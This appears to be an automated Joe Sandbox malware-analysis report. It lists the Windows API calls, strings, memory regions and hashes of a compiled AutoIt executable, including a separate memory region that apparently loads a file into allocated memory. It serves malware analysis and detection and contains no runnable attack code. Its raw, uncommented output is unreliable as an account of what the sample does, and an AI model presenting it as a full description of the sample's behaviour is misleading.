                                                              • Part of subcall function 00CD39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CD3A24
                                                              • Part of subcall function 00CD39D5: ShowWindow.USER32(00000000,?,?), ref: 00CD3A38
                                                              • Part of subcall function 00CD39D5: ShowWindow.USER32(00000000,?,?), ref: 00CD3A41
                                                              • Part of subcall function 00CD434A: _memset.LIBCMT ref: 00CD4370
                                                              • Part of subcall function 00CD434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CD4415
                                                            Strings
                                                            • runas, xrefs: 00D0D33A
                                                            • This is a third-party compiled AutoIt script., xrefs: 00D0D279
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 529118366-3287110873
                                                            • Opcode ID: 97f1c20610aaf94b4b367a3ff9933a32109e7f7de8abd4e28ff7a81679c0855d
                                                            • Instruction ID: 17d42429b9012c0d7bd872288971ebf2e39c3c589caa64362f498e9654796d88
                                                            • Opcode Fuzzy Hash: 97f1c20610aaf94b4b367a3ff9933a32109e7f7de8abd4e28ff7a81679c0855d
                                                            • Instruction Fuzzy Hash: 65510570A08388AEDF02EBB4EC05AED7B79AB45350F004167FA11E63A1DA708605DB35

                                                            Control-flow Graph

                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00CD49CD
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • GetCurrentProcess.KERNEL32(?,00D5FAEC,00000000,00000000,?), ref: 00CD4A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00CD4AA1
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00CD4AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00CD4AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00CD4B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00CD4B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 2da872a21a041ddffd7bf266f62589b54b71955524dd179ef4689e53346e3215
                                                            • Instruction ID: 02ff76e7dfc6aecf76a2c35a1bc0b3b1bae24812d27760f71dfd803baa55b3c8
                                                            • Opcode Fuzzy Hash: 2da872a21a041ddffd7bf266f62589b54b71955524dd179ef4689e53346e3215
                                                            • Instruction Fuzzy Hash: C391A431989BC0DFC735DB6885506AABFF5AF29300B4849AFD2CB97B41D230E508D769

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00CD4D8E,?,?,00000000,00000000), ref: 00CD4E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00CD4D8E,?,?,00000000,00000000), ref: 00CD4EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00CD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00CD4E2F), ref: 00D0D937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00CD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00CD4E2F), ref: 00D0D94C
                                                            • LockResource.KERNEL32(00CD4D8E,?,?,00CD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00CD4E2F,00000000), ref: 00D0D95F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: fb27b6ec5db92c3e48f79b5202c53cae3efef80e7594cbe03639eea3cc4a1114
                                                            • Instruction ID: 3526c18d095bf64d276e7e09221731e23ab58128e0c07968fcb185ff99e19186
                                                            • Opcode Fuzzy Hash: fb27b6ec5db92c3e48f79b5202c53cae3efef80e7594cbe03639eea3cc4a1114
                                                            • Instruction Fuzzy Hash: E71151B5240700BFD7258B65EC48F67BBBAFBC5751F104169FA15CA750DB71D8008671
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00D0E398), ref: 00D3446A
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00D3447B
                                                            • FindClose.KERNEL32(00000000), ref: 00D3448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: b2da3eacc719ab791b84583289bdefa0f9257d64edc9808151ada0628f8be6ed
                                                            • Instruction ID: 282960e5596691c0552c54473a60c6a5445deab82643bca6f80040b1d23d72cf
                                                            • Opcode Fuzzy Hash: b2da3eacc719ab791b84583289bdefa0f9257d64edc9808151ada0628f8be6ed
                                                            • Instruction Fuzzy Hash: FFE0D8724107006752106B38EC0D5E9775CDE05336F140725FD35C21E0E7B8A90096B6
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 00D13E62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: cbc88fd007b412fb25283eeafedfd8df84ce2926ba3a090638554cfdb886e067
                                                            • Instruction ID: a1fd965a0fbbe10845ccac79533afab38a111cb4c2554f40e0dacbd0db9b5439
                                                            • Opcode Fuzzy Hash: cbc88fd007b412fb25283eeafedfd8df84ce2926ba3a090638554cfdb886e067
                                                            • Instruction Fuzzy Hash: 23A29074A00205DFCB14DF59C480AAEB7B2FF59314F64806AEA169F351D731EE82DBA0
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE0A5B
                                                            • timeGetTime.WINMM ref: 00CE0D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE0E53
                                                            • Sleep.KERNEL32(0000000A), ref: 00CE0E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00CE0EFA
                                                            • DestroyWindow.USER32 ref: 00CE0F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CE0F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00D14E83
                                                            • TranslateMessage.USER32(?), ref: 00D15C60
                                                            • DispatchMessageW.USER32(?), ref: 00D15C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D15C82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                            • API String ID: 4212290369-3242690629
                                                            • Opcode ID: 1864df97eb8d736d64ab77eb8adcc2fe8f62350653fa6ab785545d9b2fcfefca
                                                            • Instruction ID: be298e9e28d1274b41fa4c24719dcfdd4d6dd4a144dddab45e3ae146e4aa81a0
                                                            • Opcode Fuzzy Hash: 1864df97eb8d736d64ab77eb8adcc2fe8f62350653fa6ab785545d9b2fcfefca
                                                            • Instruction Fuzzy Hash: FAB2C270608741EFD724DF24E884BAAB7E1FF84304F24491DE599973A1CB74E984DBA2

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00D38F5F: __time64.LIBCMT ref: 00D38F69
                                                              • Part of subcall function 00CD4EE5: _fseek.LIBCMT ref: 00CD4EFD
                                                            • __wsplitpath.LIBCMT ref: 00D39234
                                                              • Part of subcall function 00CF40FB: __wsplitpath_helper.LIBCMT ref: 00CF413B
                                                            • _wcscpy.LIBCMT ref: 00D39247
                                                            • _wcscat.LIBCMT ref: 00D3925A
                                                            • __wsplitpath.LIBCMT ref: 00D3927F
                                                            • _wcscat.LIBCMT ref: 00D39295
                                                            • _wcscat.LIBCMT ref: 00D392A8
                                                              • Part of subcall function 00D38FA5: _memmove.LIBCMT ref: 00D38FDE
                                                              • Part of subcall function 00D38FA5: _memmove.LIBCMT ref: 00D38FED
                                                            • _wcscmp.LIBCMT ref: 00D391EF
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39824
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D39452
                                                            • _wcsncpy.LIBCMT ref: 00D394C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00D394FB
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D39511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D39522
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D39534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: aac826b1cfb10521f9d83cdf69f3be6e0c31f9373d6ec0eb172e5c9b95cdcb9c
                                                            • Instruction ID: ad36ebaf44ef8ee62c418e7008077140f8785a53a071f9b0b56693ff6c8657f0
                                                            • Opcode Fuzzy Hash: aac826b1cfb10521f9d83cdf69f3be6e0c31f9373d6ec0eb172e5c9b95cdcb9c
                                                            • Instruction Fuzzy Hash: 91C14CB1D00219ABDF25DF94CC95EEEB7BCEF45310F0040AAF609E6251DB709A849F65

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CD3074
                                                            • RegisterClassExW.USER32(00000030), ref: 00CD309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00CD30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CD30DC
                                                            • LoadIconW.USER32(000000A9), ref: 00CD30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CD3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 4f801febb033d7e449de5a467db1739847e73fa02adb66ad6a04c9655e3541b5
                                                            • Instruction ID: 63b8fc5e9fbfe4bc0c652b7965e3a62c7407d99627554bda946aa4ba049f06d3
                                                            • Opcode Fuzzy Hash: 4f801febb033d7e449de5a467db1739847e73fa02adb66ad6a04c9655e3541b5
                                                            • Instruction Fuzzy Hash: 9E3116B1941309AFDB419FA4E889BDDBBF4FB09311F14416AE980EA3A0D3B50585CFA1

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CD3074
                                                            • RegisterClassExW.USER32(00000030), ref: 00CD309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00CD30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CD30DC
                                                            • LoadIconW.USER32(000000A9), ref: 00CD30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CD3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 8939a3b52581f246d8b9bd1b3532d7dc9f4959623361f0f0fb70484db46cd970
                                                            • Instruction ID: bd2dc5ff6e8127f47c3967433bf237de8c4a32f2bc57e3651e6f4f6831b0212b
                                                            • Opcode Fuzzy Hash: 8939a3b52581f246d8b9bd1b3532d7dc9f4959623361f0f0fb70484db46cd970
                                                            • Instruction Fuzzy Hash: 7621E3B1901308AFDB01DFA4E888BDEBBF4FB08701F04412AF911EA3A0D7B145448FA5

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00CD4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D952F8,?,00CD37AE,?), ref: 00CD4724
                                                              • Part of subcall function 00CF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00CD7165), ref: 00CF052D
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00CD71A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D0E8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D0E909
                                                            • RegCloseKey.ADVAPI32(?), ref: 00D0E947
                                                            • _wcscat.LIBCMT ref: 00D0E9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: 371e1ecf72a91a7ed0abbad9c3c6389db36d212787ea2474590af1969928675e
                                                            • Instruction ID: 63aa234b0094c858542263f10ca03efad64a29ceac7fc2aa219259ab2d832d84
                                                            • Opcode Fuzzy Hash: 371e1ecf72a91a7ed0abbad9c3c6389db36d212787ea2474590af1969928675e
                                                            • Instruction Fuzzy Hash: C9716B715093019EC704EF69E8419ABBBE8FF85350B440A2FF549C73A0EB71D948DBA6

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CD3A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00CD3A5F
                                                            • LoadIconW.USER32(00000063), ref: 00CD3A76
                                                            • LoadIconW.USER32(000000A4), ref: 00CD3A88
                                                            • LoadIconW.USER32(000000A2), ref: 00CD3A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CD3AC0
                                                            • RegisterClassExW.USER32(?), ref: 00CD3B16
                                                              • Part of subcall function 00CD3041: GetSysColorBrush.USER32(0000000F), ref: 00CD3074
                                                              • Part of subcall function 00CD3041: RegisterClassExW.USER32(00000030), ref: 00CD309E
                                                              • Part of subcall function 00CD3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD30AF
                                                              • Part of subcall function 00CD3041: InitCommonControlsEx.COMCTL32(?), ref: 00CD30CC
                                                              • Part of subcall function 00CD3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CD30DC
                                                              • Part of subcall function 00CD3041: LoadIconW.USER32(000000A9), ref: 00CD30F2
                                                              • Part of subcall function 00CD3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CD3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 1b42a8d697876277efcbced4ea348486652ee7e0ad467cc069c34c4cdb1882cb
                                                            • Instruction ID: 7a0985111b7e4de40370b9ea7f67ce7099670f42c0bab76f66c08c70944d5c6f
                                                            • Opcode Fuzzy Hash: 1b42a8d697876277efcbced4ea348486652ee7e0ad467cc069c34c4cdb1882cb
                                                            • Instruction Fuzzy Hash: 4C210871900305AFEB12DFA4FC49B9D7BB5EB08711F10016AEA04EB3A5D3B556509FA8

                                                            Control-flow Graph

                                                             • Graph (interactive, not reproduced): basic blocks cd3633-cd3764 and d0d06f-d0d16e
                                                             • API calls in the graph: PostQuitMessage, DefWindowProcW, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow, SetFocus
                                                             • Internal calls: ce1070, ce1093, d32527, cd44a0, cd443a, cd3114, d27c36, d32d36, cd434a
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00CD36D2
                                                            • KillTimer.USER32(?,00000001), ref: 00CD36FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CD371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD372A
                                                            • CreatePopupMenu.USER32 ref: 00CD373E
                                                            • PostQuitMessage.USER32(00000000), ref: 00CD374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: dd2450d7d9fc2142dadaec88bae5f01a15d9429a75d5046879c9bc6841f8a77d
                                                            • Instruction ID: 42de2b6e7e5d97d70afc1f777c7ecfede869fe014f5e682f1eaae7adfcbe19ca
                                                            • Opcode Fuzzy Hash: dd2450d7d9fc2142dadaec88bae5f01a15d9429a75d5046879c9bc6841f8a77d
                                                            • Instruction Fuzzy Hash: B34121B2200B85BBDB256FA8EC09B793B99EB05301F140137FB02D63E5CA709A419777

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                            • API String ID: 1825951767-3513169116
                                                            • Opcode ID: 58b90c3774356270669c78de40a46c61b38a71198d67ff22a4df9749d4f31e13
                                                            • Instruction ID: 3a6a3ca2cddf4c2ca72506f59ce03eb07ae1b59430fe4ca99e3ede926bc62524
                                                            • Opcode Fuzzy Hash: 58b90c3774356270669c78de40a46c61b38a71198d67ff22a4df9749d4f31e13
                                                            • Instruction Fuzzy Hash: 25A15C7190025D9ACF05EBA4DC91AEEB779FF14300F44042BFA16B7291EF749A08DBA1

                                                            Control-flow Graph

                                                             • Graph (interactive, not reproduced): basic blocks 13c2650-13c2952; the block at 13c286e-13c2877 loops back to the CreateFileW block at 13c2705
                                                             • API calls in the graph: CreateFileW, VirtualAlloc (two sites), ReadFile, CloseHandle, VirtualFree (two sites)
                                                             • Internal calls: 13c0000, 13c3560, 13c37b0, 13c35c0
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013C2721
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013C2947
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
